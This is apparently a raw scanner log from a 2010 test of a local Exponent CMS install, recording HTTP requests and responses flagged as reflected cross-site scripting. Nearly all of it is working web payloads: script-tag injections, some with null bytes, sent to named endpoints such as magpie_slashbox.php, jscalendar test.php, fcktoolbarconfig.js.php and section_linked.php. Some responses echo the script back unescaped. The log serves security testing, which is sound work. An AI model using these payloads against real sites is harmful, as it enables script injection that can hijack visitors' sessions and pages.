GET /exponent/external/magpierss/scripts/magpie_slashbox.php?rss_url=3143%00%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Fri, 08 Oct 2010 22:32:30 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 704
Content-Type: text/html




displaying: 3143


Warning: MagpieRSS: Failed to fetch 3143 in C:\xampp\xampplite\htdocs\exponent\external\magpierss\rss_fetch.inc on line 238

Warning: Invalid argument supplied for foreach() in C:\xampp\xampplite\htdocs\exponent\external\magpierss\scripts\magpie_slashbox.php on line 56






----------------------------------------------------------------

Alert Name: Reflected XSS
GET /exponent/external/jscalendar/test.php?lang=3153%3cscript%3ealert(0)%3c%2fscript%3e&submitted=3153%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Fri, 08 Oct 2010 22:32:31 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1
X-Powered-By: PHP/5.3.1
Set-Cookie: lang=3153%3Cscript%3Ealert%280%29%3C%2Fscript%3E
Content-Length: 623
Content-Type: text/html





Test for calendar.php











Form submitted

lang = 3153<script>alert(0)</script>
submitted = 3153<script>alert(0)</script>
---------------------------------------------------------------- Alert Name: Reflected XSS GET /exponent/external/jscalendar/test.php?lang=3155%00%3cscript%3ealert(0)%3c%2fscript%3e&submitted=3155%00%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 0 Cache-Control: max-age=0 Origin: null Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:32:31 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: lang=3155%00%3Cscript%3Ealert%280%29%3C%2Fscript%3E Content-Length: 626 Content-Type: text/html Test for calendar.php

Form submitted

lang = 3155<script>alert(0)</script>
submitted = 3155<script>alert(0)</script>
---------------------------------------------------------------- Alert Name: Reflected XSS GET /exponent/external/editors/fcktoolbarconfig.js.php?toolbar=3157%3cscript%3ealert(0)%3c%2fscript%3e&plugins=3157%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 0 Cache-Control: max-age=0 Origin: null Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:32:31 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 232 Content-Type: text/javascript FCKConfig.ToolbarSets["Default"] = 3157; plugins = 3157; for(currPlugin = 0; currPlugin < plugins.length; currPlugin++) { FCKConfig.Plugins.Add(plugins[currPlugin], null ); } ---------------------------------------------------------------- Alert Name: Reflected XSS GET /exponent/external/editors/fcktoolbarconfig.js.php?toolbar=3159%00%3cscript%3ealert(0)%3c%2fscript%3e&plugins=3159%00%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 0 Cache-Control: max-age=0 Origin: null Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:32:31 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 234 Content-Type: text/javascript FCKConfig.ToolbarSets["Default"] = 3159; plugins = 3159; for(currPlugin = 0; currPlugin < plugins.length; currPlugin++) { FCKConfig.Plugins.Add(plugins[currPlugin], null ); } ---------------------------------------------------------------- Alert Name: Reflected XSS GET /exponent/external/editors/connector/section_linked.php?expid=3201%3cscript%3ealert(0)%3c%2fscript%3e&ajax_action=3201%3cscript%3ealert(0)%3c%2fscript%3e§ion=3201%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 0 Cache-Control: max-age=0 Origin: null Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:32:34 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=mrls669eqv00p6rbittifl3i15; expires=Sun, 16-Jan-2011 22:32:34 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 677 Content-Type: text/html "; // uncheck external link box in parent window f_extern.checked = false; // set title f_title.value = "Link to section "; window.close(); ---------------------------------------------------------------- Alert Name: Reflected XSS GET /exponent/external/editors/connector/section_linked.php?expid=3202%3cscript%3ealert(0)%3c%2fscript%3e&ajax_action=3202%3cscript%3ealert(0)%3c%2fscript%3e§ion=3202%3cscript%3ealert(0)%3c%2fscript%3e§ion_name=3202%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 0 Cache-Control: max-age=0 Origin: null Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:32:34 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=msat496gapb5sfae4cmpbcdlc0; expires=Sun, 16-Jan-2011 22:32:34 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 706 Content-Type: text/html "; // uncheck external link box in parent window f_extern.checked = false; // set title f_title.value = "Link to section 3202"; window.close(); ---------------------------------------------------------------- Alert Name: Reflected XSS GET /exponent/external/editors/connector/section_linked.php?expid=3204%00%3cscript%3ealert(0)%3c%2fscript%3e&ajax_action=3204%00%3cscript%3ealert(0)%3c%2fscript%3e§ion=3204%00%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 0 Cache-Control: max-age=0 Origin: null Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:32:34 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=3204; expires=Sun, 16-Jan-2011 22:32:35 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 678 Content-Type: text/html "; // uncheck external link box in parent window f_extern.checked = false; // set title f_title.value = "Link to section "; window.close(); ---------------------------------------------------------------- Alert Name: Reflected XSS GET /exponent/external/editors/connector/section_linked.php?expid=3205%00%3cscript%3ealert(0)%3c%2fscript%3e&ajax_action=3205%00%3cscript%3ealert(0)%3c%2fscript%3e§ion=3205%00%3cscript%3ealert(0)%3c%2fscript%3e§ion_name=3205%00%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 0 Cache-Control: max-age=0 Origin: null Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:32:35 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=3205; expires=Sun, 16-Jan-2011 22:32:35 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 708 Content-Type: text/html "; // uncheck external link box in parent window f_extern.checked = false; // set title f_title.value = "Link to section 3205"; window.close(); ----------------------------------------------------------------